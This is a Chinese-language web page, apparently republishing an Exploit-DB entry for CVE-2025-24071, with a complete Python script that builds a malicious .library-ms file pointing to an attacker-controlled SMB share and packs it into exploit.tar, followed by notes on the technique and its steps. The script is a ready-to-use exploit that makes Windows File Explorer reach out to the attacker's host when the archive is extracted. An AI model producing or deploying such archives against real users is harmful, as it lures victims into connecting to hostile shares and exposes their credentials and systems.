Windows 10 Pro x64 文件管理器TAR提取远程漏洞利用

本文详细介绍了Windows 10 Pro x64文件管理器在处理TAR文件时的远程漏洞利用方法,包含完整的Python代码实现和漏洞利用过程,涉及网络共享路径构造和文件操作技术。

Windows File Explorer Windows 10 Pro x64 - TAR Extraction - Windows remote Exploit

漏洞信息

  • EDB-ID: 52325
  • CVE: 2025-24071
  • 类型: 远程漏洞
  • 平台: Windows
  • 日期: 2025-06-13
  • 作者: Daniel Miranda
  • 验证状态: EDB已验证

漏洞利用代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import os
import tarfile

def main():
    file_name = input("Enter your file name: ")
    ip_address = input("Enter IP (EX: 192.168.1.162): ")

    library_content = f"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\{ip_address}\\IT</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

    library_file_name = f"{file_name}.library-ms"
    with open(library_file_name, "w", encoding="utf-8") as f:
        f.write(library_content)

    tar_name = "exploit.tar"
    with tarfile.open(tar_name, "w") as tarf:
        tarf.add(library_file_name)

    if os.path.exists(library_file_name):
        os.remove(library_file_name)

    print("completed")

if __name__ == "__main__":
    main()

技术说明

该漏洞利用涉及以下技术要点:

  1. 库文件构造: 创建恶意的.library-ms文件,其中包含指向远程共享位置的XML配置
  2. 网络路径注入: 通过\\\\{ip_address}\\IT格式构造UNC路径,指向攻击者控制的共享资源
  3. TAR文件打包: 使用Python的tarfile模块将恶意库文件打包成TAR归档
  4. 文件清理: 利用完成后自动删除临时生成的库文件

利用流程

  1. 用户输入文件名和目标IP地址
  2. 生成包含恶意网络路径的库配置文件
  3. 将配置文件打包为TAR文件
  4. 清理临时文件并完成利用准备

该漏洞允许攻击者通过特制的TAR文件诱导用户连接到恶意网络共享,从而实现远程攻击。

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计